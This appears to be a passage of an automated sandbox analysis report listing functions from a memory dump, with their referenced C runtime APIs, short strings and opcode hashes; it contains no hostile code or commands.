Opcode Fuzzy Hash: 46baf94f3c1451638f40d6a882f26b556337f8de84ec26c537f4bcefb158be94
Instruction Fuzzy Hash: 5771E530A44244DFCF45CBE4DAA4BEE7BF6AF12304F158599D641A7280D7719AC8DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1EA0A0, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

<program name unknown>, xrefs: 6E1EA17D

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID:
String ID: <program name unknown>
API String ID: 0-554726554
Opcode ID: cdec2e1ff8766d35109147ba3464e75d1cac8c5e04fd3fac3648883687a5771a
Instruction ID: f68d421bdc5adeac7a6b08024c9ca815996f2db16533640126aba5a768b537fa
Opcode Fuzzy Hash: cdec2e1ff8766d35109147ba3464e75d1cac8c5e04fd3fac3648883687a5771a
Instruction Fuzzy Hash: 7B4126B5E4020CBBDB14EAE49C12FDE776A6F54308F148524FA047F382E6719B50DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B1570, Relevance: 19.6, APIs: 13, Instructions: 111COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B1579
Mailbox.LIBCMTD ref: 6E1B1592
Mailbox.LIBCMTD ref: 6E1B1608
DName::DName.LIBVCRUNTIMED ref: 6E1B1675

Part of subcall function 6E1A9110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E1A916E

DName::operator+.LIBCMTD ref: 6E1B1688
DName::operator+.LIBCMTD ref: 6E1B15FF

Part of subcall function 6E1A9860: Mailbox.LIBCMTD ref: 6E1A9870
Part of subcall function 6E1A9860: Mailbox.LIBCMTD ref: 6E1A9888

DName::operator+.LIBCMTD ref: 6E1B15EC

Part of subcall function 6E1A9820: Mailbox.LIBCMTD ref: 6E1A9830
Part of subcall function 6E1A9820: Mailbox.LIBCMTD ref: 6E1A9848

DName::operator=.LIBVCRUNTIMED ref: 6E1B163C
DName::isEmpty.LIBCMTD ref: 6E1B1646
DName::operator=.LIBVCRUNTIMED ref: 6E1B1654

Part of subcall function 6E1B0FE0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B0FEC
Part of subcall function 6E1B0FE0: Mailbox.LIBCMTD ref: 6E1B1044

DName::operator+.LIBCMTD ref: 6E1B169B
Mailbox.LIBCMTD ref: 6E1B16A4
Mailbox.LIBCMTD ref: 6E1B16B0

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Mailbox$Name::operator+$Iterator_baseIterator_base::_NameName::operator=std::_$EmptyName::Name::isNode::makeStatus
String ID:
API String ID: 2733737839-0
Opcode ID: 2f2d5e23cb4141809768e3fdfece1f8fa02de8670207034bde64b317c6de5722
Instruction ID: b6df09dc9a592df8eca1fe8a050d6a688f3a7bb63a1223a3d99c002c674c00ec
Opcode Fuzzy Hash: 2f2d5e23cb4141809768e3fdfece1f8fa02de8670207034bde64b317c6de5722
Instruction Fuzzy Hash: 4941B075E001089BCB04DFE4EDA1EFE7BBDAF45304F148569E612AB180EB712AC4DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AC260, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 155COMMON

Download Yara Rule

APIs

UnDecorator::doEllipsis.LIBCMTD ref: 6E1AC294
UnDecorator::getArgumentList.LIBCMTD ref: 6E1AC343

Part of subcall function 6E1AC110: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AC120
Part of subcall function 6E1AC110: DName::operator+=.LIBCMTD ref: 6E1AC16C
Part of subcall function 6E1AC110: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AC1D1
Part of subcall function 6E1AC110: Replicator::isFull.LIBCMTD ref: 6E1AC1F7
Part of subcall function 6E1AC110: Replicator::operator+=.LIBCMTD ref: 6E1AC20A
Part of subcall function 6E1AC110: DName::operator=.LIBVCRUNTIMED ref: 6E1AC22B
Part of subcall function 6E1AC110: DName::operator+=.LIBCMTD ref: 6E1AC237
Part of subcall function 6E1AC110: Mailbox.LIBCMTD ref: 6E1AC24A

Mailbox.LIBCMTD ref: 6E1AC388
UnDecorator::doEllipsis.LIBCMTD ref: 6E1AC3A4
DName::operator+.LIBCMTD ref: 6E1AC40E
Mailbox.LIBCMTD ref: 6E1AC417
Mailbox.LIBCMTD ref: 6E1AC435
DName::DName.LIBVCRUNTIMED ref: 6E1AC444

Part of subcall function 6E1A9110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E1A916E

Mailbox.LIBCMTD ref: 6E1AC457

Strings

Z, xrefs: 6E1AC27A
Z, xrefs: 6E1AC376

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Mailbox$Decorator::doEllipsisIterator_baseIterator_base::_NameName::operator+=std::_$ArgumentDecorator::getFullListName::Name::operator+Name::operator=Node::makeReplicator::isReplicator::operator+=Status
String ID: Z$Z
API String ID: 3869916097-3829148472
Opcode ID: dc954b50fabf2fb960c222e040f6ac19802329a7c955a5ce4322202544fc9604
Instruction ID: 21627309236c6d515ad0ae3fb6a499cb41cd72361e0b6f653d388b8a9a16b3e9
Opcode Fuzzy Hash: dc954b50fabf2fb960c222e040f6ac19802329a7c955a5ce4322202544fc9604
Instruction Fuzzy Hash: E2611878D00208EFCF44CFE9D990AEDBBF6AF49304F108559E619AB350E7706A84DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AE7B0, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 171COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMTD ref: 6E1AE7F2

Part of subcall function 6E1A9920: Mailbox.LIBCMTD ref: 6E1A9930
Part of subcall function 6E1A9920: DName::operator+=.LIBCMTD ref: 6E1A993C
Part of subcall function 6E1A9920: Mailbox.LIBCMTD ref: 6E1A9948

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AE802
UnDecorator::doEcsu.LIBCMTD ref: 6E1AE815
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AE854

Strings

W, xrefs: 6E1AE9AF

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Iterator_baseIterator_base::_Mailboxstd::_$Decorator::doEcsuName::operator+Name::operator+=
String ID: W
API String ID: 4208403871-655174618
Opcode ID: b905bd90b7dc110250bf3e37ca7fd7af82c47ca271a318a4677e753519301b65
Instruction ID: 3ee49476963cb005542387b111c8ad93b770e2b8c5b104f5a4bccc6e89e295e1
Opcode Fuzzy Hash: b905bd90b7dc110250bf3e37ca7fd7af82c47ca271a318a4677e753519301b65
Instruction Fuzzy Hash: CF6171B9C00208EFCB55DFE8E850AFDBBB9BF15304F048529E606AA254EB3157C4DB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B40B0, Relevance: 16.6, APIs: 11, Instructions: 117COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B40B9
operator+.LIBVCRUNTIMED ref: 6E1B4127

Part of subcall function 6E1A9790: DName::operator+.LIBCMTD ref: 6E1A97B0

Mailbox.LIBCMTD ref: 6E1B4133
UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E1B4116

Part of subcall function 6E1AE050: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E1AE07B
Part of subcall function 6E1AE050: Mailbox.LIBCMTD ref: 6E1AE0C6

Mailbox.LIBCMTD ref: 6E1B4172
UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E1B41A9
Mailbox.LIBCMTD ref: 6E1B41B5
DName::operator=.LIBVCRUNTIMED ref: 6E1B4202
Mailbox.LIBCMTD ref: 6E1B4225

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Mailbox$DecoratedDecorator::getName$Iterator_baseIterator_base::_Name::operator+Name::operator=operator+std::_
String ID:
API String ID: 1608807181-0
Opcode ID: b6c9488819200a71b48b16858feda7301f4573a30c70897a6ab4573b52389214
Instruction ID: 808201400c1c2999ac35834a2493428b5164f059ea75ef2a16ef1cdeb2ea7678
Opcode Fuzzy Hash: b6c9488819200a71b48b16858feda7301f4573a30c70897a6ab4573b52389214
Instruction Fuzzy Hash: 204106759042049BDB04CBE4E9F0BFE3BFAAB12314F14C569D51647684FB706AC6EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B5D40, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 299COMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,?,00000000,?,6E1B6D52,?,?,?,?,?,?,?,6E1E0DE4,00000002,?,00000000), ref: 6E1B5D80
__invoke_watson_if_error.LIBCMTD ref: 6E1B5E23

Strings

@, xrefs: 6E1B5EEF
@, xrefs: 6E1B5E4C

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: HandleModule__invoke_watson_if_error
String ID: @$@
API String ID: 3976807648-149943524
Opcode ID: 07076e79b3474868ce973c6de96336857f4ebeebc120c6991415e5e813af2806
Instruction ID: e86318bb0d2674f878f2349048dc2a8eec828aae91567066397aa7f1216ba7a2
Opcode Fuzzy Hash: 07076e79b3474868ce973c6de96336857f4ebeebc120c6991415e5e813af2806
Instruction Fuzzy Hash: 8FD18AB495422DEBDB24DFD4CC49BDAB3B6AB68304F1041E9E6086B280D7709BC4DF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B5850, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 296COMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,?,00000000,?,6E1B6D22,?,?,?,?,?,?,?,6E1E042F,00000002,?,00000000), ref: 6E1B5890
__invoke_watson_if_error.LIBCMTD ref: 6E1B5933

Strings

@, xrefs: 6E1B595C
@, xrefs: 6E1B59F0

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: HandleModule__invoke_watson_if_error
String ID: @$@
API String ID: 3976807648-149943524
Opcode ID: f4e3e4df114033a1370ded15aa8d5888bca49ee7609da32ce3314e509d1b44ef
Instruction ID: 6a54a305215a4399cbbe173a1e121e5d743a74808d08a9fac1ae7a9ec27025ad
Opcode Fuzzy Hash: f4e3e4df114033a1370ded15aa8d5888bca49ee7609da32ce3314e509d1b44ef
Instruction Fuzzy Hash: 5CD16AB4904229DBDB24CF90CC89BDEB7B6AB69704F1044E9E7096A280D7709BD4DF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B0980, Relevance: 15.2, APIs: 10, Instructions: 203COMMON

Download Yara Rule

APIs

DName::isEmpty.LIBCMTD ref: 6E1B09C0
operator+.LIBVCRUNTIMED ref: 6E1B0A13
DName::isEmpty.LIBCMTD ref: 6E1B0AD2
operator+.LIBVCRUNTIMED ref: 6E1B0C17

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: EmptyName::isoperator+
String ID:
API String ID: 1193048883-0
Opcode ID: 2e044cbcbc37271ca6a079d0e39f8d601f57c74466d954b88d79dff126e33bf5
Instruction ID: 3e368813ada382e02e81231cdf15eeff0ffb021faff86902814b57836a2c8255
Opcode Fuzzy Hash: 2e044cbcbc37271ca6a079d0e39f8d601f57c74466d954b88d79dff126e33bf5
Instruction Fuzzy Hash: 6C717875904104EFCB44CFE8EAA0AFE7BBAAF55304F10C569F6059B281E7719AC1DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A7960, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 153COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIMED ref: 6E1A796A

Part of subcall function 6E1A85C0: __guard_icall_checks_enforced.LIBCMTD ref: 6E1A85C6

___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A7972
__FrameHandler3::isEHs.LIBVCRUNTIMED ref: 6E1A79AA
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIMED ref: 6E1A79F4
_Smanip.LIBCPMTD ref: 6E1A7A0F
__FrameHandler3::isNoExcept.LIBVCRUNTIMED ref: 6E1A7A5E

Strings

csm, xrefs: 6E1A7980
csm, xrefs: 6E1A7A74

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Frame$Handler3::is$EmptyExceptHandler3::SmanipStateUnwind___except_validate_context_record___vcrt_getptd__guard_icall_checks_enforced
String ID: csm$csm
API String ID: 2671830719-3733052814
Opcode ID: aa2840e28286c8f098a7c40dcbbadbff355a196f96eb3627693a9d4ac43224cc
Instruction ID: c2eaa4f083314abd048b26f41e002cf8f99d28ff7fdb4924aaf077470645aaf3
Opcode Fuzzy Hash: aa2840e28286c8f098a7c40dcbbadbff355a196f96eb3627693a9d4ac43224cc
Instruction Fuzzy Hash: D55141B9A00109ABDB04CFD8D895EFF77BDAF58304F148519FA098B284D734EA91DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A76E0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A76F7
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A7702

Strings

MOC, xrefs: 6E1A771B
RCC, xrefs: 6E1A7726

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: ___vcrt_getptd
String ID: MOC$RCC
API String ID: 984050374-2084237596
Opcode ID: f1e9a66609e8aed6f777036c6d297fddcd955a55f85439bd348ecd303540d648
Instruction ID: 664a4baba7a2f391da8b36783e2cc19477a6519c4e19b16372de6ba0e53e3b7e
Opcode Fuzzy Hash: f1e9a66609e8aed6f777036c6d297fddcd955a55f85439bd348ecd303540d648
Instruction Fuzzy Hash: 37510079A00109EBDB04CFDCC990EFE73B9AF58304F50855AEA1597294D734EE81DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AEED0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E1AEEF4

Part of subcall function 6E1A9110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E1A916E

DName::DName.LIBVCRUNTIMED ref: 6E1AEF49

Strings

A, xrefs: 6E1AEFDB

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Name$Name::$Node::makeStatus
String ID: A
API String ID: 3739413223-3554254475
Opcode ID: e0191008a7d8d8282b3f865bdc868991a0566722a55a9635688b99d6525aa5b5
Instruction ID: 295d1a7aa354ff1b6de11cb79fc473d2bf6145ce528e398fbc94b2a37c858a2e
Opcode Fuzzy Hash: e0191008a7d8d8282b3f865bdc868991a0566722a55a9635688b99d6525aa5b5
Instruction Fuzzy Hash: B851D174D04208DFCF04DFE8D9948EEBBBABF59304F148459E6099B244DB319A85DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B1F50, Relevance: 13.6, APIs: 9, Instructions: 124COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E1B1F8C
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B2003
Mailbox.LIBCMTD ref: 6E1B203F
Mailbox.LIBCMTD ref: 6E1B205A
DName::isEmpty.LIBCMTD ref: 6E1B2062
DName::operator+=.LIBCMTD ref: 6E1B207F
DName::operator+=.LIBCMTD ref: 6E1B20AE
DName::operator+=.LIBCMTD ref: 6E1B20B8
Mailbox.LIBCMTD ref: 6E1B2101

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: MailboxName::operator+=$EmptyIterator_baseIterator_base::_NameName::Name::isstd::_
String ID:
API String ID: 3761117093-0
Opcode ID: 140536acc5319b1dfc6cc99f96f3790fe066b859482d7ffc4dde5f172929dff3
Instruction ID: 16a8e8c77ace869a9fd783eac7b0bd4433ef61cd470d080bf668cd705b2ef616
Opcode Fuzzy Hash: 140536acc5319b1dfc6cc99f96f3790fe066b859482d7ffc4dde5f172929dff3
Instruction Fuzzy Hash: EB519274D402149BCF04DFA4E9A4BFE77BABB56304F108259D612972C0DB716AC9DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B0C30, Relevance: 13.6, APIs: 9, Instructions: 124COMMON

Download Yara Rule

APIs

DName::isEmpty.LIBCMTD ref: 6E1B0C95
DName::isEmpty.LIBCMTD ref: 6E1B0CA1
DName::isEmpty.LIBCMTD ref: 6E1B0CC5
DName::DName.LIBVCRUNTIMED ref: 6E1B0D44
DName::isEmpty.LIBCMTD ref: 6E1B0D58
DName::isEmpty.LIBCMTD ref: 6E1B0D70
DName::isEmpty.LIBCMTD ref: 6E1B0D7C
DName::operator+=.LIBCMTD ref: 6E1B0D8A
Mailbox.LIBCMTD ref: 6E1B0DA2

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: EmptyName::is$MailboxNameName::Name::operator+=
String ID:
API String ID: 2270187897-0
Opcode ID: 8814689bb926a28898ce4fe47d7206602160c8876b8d76ed949b95f103dda0a9
Instruction ID: 79bbb4308a5747d6562310925a628dd483a46b21cbc42e10c9b8c693384c5060
Opcode Fuzzy Hash: 8814689bb926a28898ce4fe47d7206602160c8876b8d76ed949b95f103dda0a9
Instruction Fuzzy Hash: B441C575A10109DBCB04CFD8DAA49EF73B9AF44304F108958EA169B290FB70EEC0DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1ADF10, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E1ADF1D

Part of subcall function 6E1A9060: pDNameNode::pDNameNode.LIBCMTD ref: 6E1A909A

operator+.LIBVCRUNTIMED ref: 6E1ADF52
DName::isEmpty.LIBCMTD ref: 6E1ADF74

Part of subcall function 6E1B04F0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B04F9

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1ADFEA
Mailbox.LIBCMTD ref: 6E1AE006

Strings

X, xrefs: 6E1ADF3D

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Name$Iterator_baseIterator_base::_std::_$EmptyMailboxName::Name::isNodeNode::poperator+
String ID: X
API String ID: 3628514644-3081909835
Opcode ID: 8d86bcd2a78517aff7a67822296331a875eb4f911b7e021b5daf31779a95ae8f
Instruction ID: a67247bd4499561b1bc577fab27010990386c3137d3c4c39b7a4b965d459b498
Opcode Fuzzy Hash: 8d86bcd2a78517aff7a67822296331a875eb4f911b7e021b5daf31779a95ae8f
Instruction Fuzzy Hash: A1318379D00108ABCF04CFE8D950AFE77B8AB45308F048158EB156B241E771ABC4DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1F02E0, Relevance: 12.1, APIs: 8, Instructions: 141timememoryCOMMON

Download Yara Rule

APIs

__wcstombs_l.LIBCMTD ref: 6E1F0399
__MarkAllocaS.LIBCMTD ref: 6E1F03A2

Part of subcall function 6E1E81B0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 6E1E81E3

std::_Timevec::_Timevec.LIBCPMTD ref: 6E1F03BD
std::_Timevec::_Timevec.LIBCPMTD ref: 6E1F03C8
std::_Mutex::_Lock.LIBCPMTD ref: 6E1F03E3
std::_Mutex::_Lock.LIBCPMTD ref: 6E1F0447
GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,00000000), ref: 6E1F046E
std::_Mutex::_Lock.LIBCPMTD ref: 6E1F047A

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: std::_$LockMutex::_$TimevecTimevec::_$AllocaByteCharMarkMultiStringTypeWide__wcstombs_l
String ID:
API String ID: 2378836076-0
Opcode ID: 5b7081eb9eadcc8586c6f122ffe9caff77d1d95cef4a7d4b7290c1b6010f2ce5
Instruction ID: 427f87014dd4e18399ba6ac9a955489daab840cf0c7ded6bfba174d23bd3cb83
Opcode Fuzzy Hash: 5b7081eb9eadcc8586c6f122ffe9caff77d1d95cef4a7d4b7290c1b6010f2ce5
Instruction Fuzzy Hash: D6510AB1910208EFDB04DFD8CC91BEEB7B9AF54308F504558E51167290EB74AA86EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B0DD0, Relevance: 12.1, APIs: 8, Instructions: 127COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B0E5B
UnDecorator::doMSKeywords.LIBCMTD ref: 6E1B0E60
DName::operator+=.LIBCMTD ref: 6E1B0E72

Part of subcall function 6E1A9AD0: DName::isValid.LIBCMTD ref: 6E1A9ADC
Part of subcall function 6E1A9AD0: DName::isEmpty.LIBCMTD ref: 6E1A9AF0

Part of subcall function 6E1A9E20: UnDecorator::doUnderScore.LIBCMTD ref: 6E1A9E26

Part of subcall function 6E1A9990: DName::isValid.LIBCMTD ref: 6E1A999C
Part of subcall function 6E1A9990: DName::isEmpty.LIBCMTD ref: 6E1A99B1

DName::DName.LIBVCRUNTIMED ref: 6E1B0F0A

Part of subcall function 6E1A9990: DName::append.LIBCMTD ref: 6E1A9A14

DName::operator+=.LIBCMTD ref: 6E1B0F4C
Mailbox.LIBCMTD ref: 6E1B0F58
DName::DName.LIBVCRUNTIMED ref: 6E1B0F69
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B0F78

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Name::is$Decorator::doEmptyIterator_baseIterator_base::_NameName::Name::operator+=Validstd::_$KeywordsMailboxName::appendScoreUnder
String ID:
API String ID: 4042095736-0
Opcode ID: ce6a192099fadf8656e0a3ee769f2c28f7cd29aaa90990049c4c45ebe402725e
Instruction ID: e6954e5cb7f44e6410f30ab1f9d8887ba5d312e73920aeef14ff629f2a4821ec
Opcode Fuzzy Hash: ce6a192099fadf8656e0a3ee769f2c28f7cd29aaa90990049c4c45ebe402725e
Instruction Fuzzy Hash: 9F518174E40209EFCF04CFE8DAA1AEEBBB5BF45304F148169E6156B290EB715AC4DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A9A30, Relevance: 12.1, APIs: 8, Instructions: 51COMMON

Download Yara Rule

APIs

DName::isValid.LIBCMTD ref: 6E1A9A3C
DName::isEmpty.LIBCMTD ref: 6E1A9A48
DName::isEmpty.LIBCMTD ref: 6E1A9A54
DName::operator=.LIBVCRUNTIMED ref: 6E1A9A69

Part of subcall function 6E1A9680: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E1A96B7

Mailbox.LIBCMTD ref: 6E1A9A77
DName::isEmpty.LIBCMTD ref: 6E1A9A81
DName::operator+=.LIBCMTD ref: 6E1A9AA4

Part of subcall function 6E1A9C00: DName::isValid.LIBCMTD ref: 6E1A9C0A
Part of subcall function 6E1A9C00: DName::isEmpty.LIBCMTD ref: 6E1A9C16
Part of subcall function 6E1A9C00: DName::operator=.LIBVCRUNTIMED ref: 6E1A9C32

DName::append.LIBCMTD ref: 6E1A9AB4

Part of subcall function 6E1A8AF0: pairNode::pairNode.LIBCMTD ref: 6E1A8B26

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Name::is$Empty$Name::operator=Valid$MailboxNameName::appendName::operator+=NodeNode::makeNode::pairStatuspair
String ID:
API String ID: 1694665504-0
Opcode ID: a50bae2e5a04cd5d19dcb78220e3e880fd3995275077969029709e1c6631a1f8
Instruction ID: 1ff1eabfa86c009cec20287610246e3d3cc1f55b21993576d838c48cce50274b
Opcode Fuzzy Hash: a50bae2e5a04cd5d19dcb78220e3e880fd3995275077969029709e1c6631a1f8
Instruction Fuzzy Hash: B7115238A10109EFCB04DFDDE9A59FD7779AF84244F10846ADA069B250DB319EC1FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A67D0, Relevance: 9.1, APIs: 6, Instructions: 148COMMON

Download Yara Rule

APIs

___unDName.LIBVCRUNTIMED ref: 6E1A6821

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Name___un
String ID:
API String ID: 3905892445-0
Opcode ID: a9c4b151671c0ea077a42d12dfb9ae727c5e8b023c6dce55323c6c87daf3f492
Instruction ID: 95de900150fd45ae3a69962a4569f1b50eabf8ada901b419abdb6a83ba842a69
Opcode Fuzzy Hash: a9c4b151671c0ea077a42d12dfb9ae727c5e8b023c6dce55323c6c87daf3f492
Instruction Fuzzy Hash: 215110B9D1410D9FDB18DFDDD890AFEB778AF14304F504468E626AB290EB306E85DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B2650, Relevance: 9.1, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

DName::getString.LIBCMTD ref: 6E1B26EB

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Name::getString
String ID:
API String ID: 1028460119-0
Opcode ID: 162fe2d12ea88aba0aa3fdc26ec43d09587ff1e22f2f64364942d3e68c68ca98
Instruction ID: da48435fd058dd4752cbbe3da92b36ec5a5aa82985cab42a372e486d73aa5ff9
Opcode Fuzzy Hash: 162fe2d12ea88aba0aa3fdc26ec43d09587ff1e22f2f64364942d3e68c68ca98
Instruction Fuzzy Hash: D04164B5D0010CEFCF05DFE8E9949EE7BF9AF59304F148429E609AB240E7716A84DB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AEA30, Relevance: 9.1, APIs: 6, Instructions: 115COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AEA39
DName::DName.LIBVCRUNTIMED ref: 6E1AEB0A
operator+.LIBVCRUNTIMED ref: 6E1AEB77
Mailbox.LIBCMTD ref: 6E1AEB83
Mailbox.LIBCMTD ref: 6E1AEB8F
DName::DName.LIBVCRUNTIMED ref: 6E1AEBA0

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: MailboxNameName::$Iterator_baseIterator_base::_operator+std::_
String ID:
API String ID: 3503010255-0
Opcode ID: 755752d690362390eaab9a619bf7056607955ff360797a4955fb148f0290e9af
Instruction ID: a052a8fe9af06d9f87392a10e6c38d48f6c134f16340c6424ae0daefeb35e517
Opcode Fuzzy Hash: 755752d690362390eaab9a619bf7056607955ff360797a4955fb148f0290e9af
Instruction Fuzzy Hash: 7D412D79D00208EFCB05DFE8E9A59FDBBB5BB45305F10816AE6066B240EB315BC4DB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AC470, Relevance: 9.1, APIs: 6, Instructions: 72COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E1AC487

Part of subcall function 6E1A9110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E1A916E

DName::operator+.LIBCMTD ref: 6E1AC4AC
DName::operator+=.LIBCMTD ref: 6E1AC4CB
DName::DName.LIBVCRUNTIMED ref: 6E1AC4F8

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Name$Name::$Name::operator+Name::operator+=Node::makeStatus
String ID:
API String ID: 2485589204-0
Opcode ID: 8d6a16ba0ce6b9ca14f8fb094d10e5c17c778f65f8581380870b761601b657d2
Instruction ID: 50662589026667956caf6fc163a52eed53be63b3981626232e3848ecb6954e64
Opcode Fuzzy Hash: 8d6a16ba0ce6b9ca14f8fb094d10e5c17c778f65f8581380870b761601b657d2
Instruction Fuzzy Hash: 7521B5B4A442189BDF44DFA8E9A5BFE77B9AB42304F008459FA025F281D772A9C4DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E5290, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 221timeCOMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMTD ref: 6E1E5325
std::_Timevec::_Timevec.LIBCPMTD ref: 6E1E5443

Part of subcall function 6E1E61B0: __wcstombs_l.LIBCMTD ref: 6E1E61CD

__invoke_watson_if_error.LIBCMTD ref: 6E1E5510

Strings

*, xrefs: 6E1E5347
?, xrefs: 6E1E534B

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: TimevecTimevec::___invoke_watson_if_error__wcstombs_lstd::_std::exception::exception
String ID: *$?
API String ID: 3210742261-2367018687
Opcode ID: de520942f3c43b86ee208adc8aa9727fe09035c948cadf25056f0347b6b020e8
Instruction ID: df986818a559be38f0d3988ef0e5c1f7c2b4955499262931629a4a7c8f18dde8
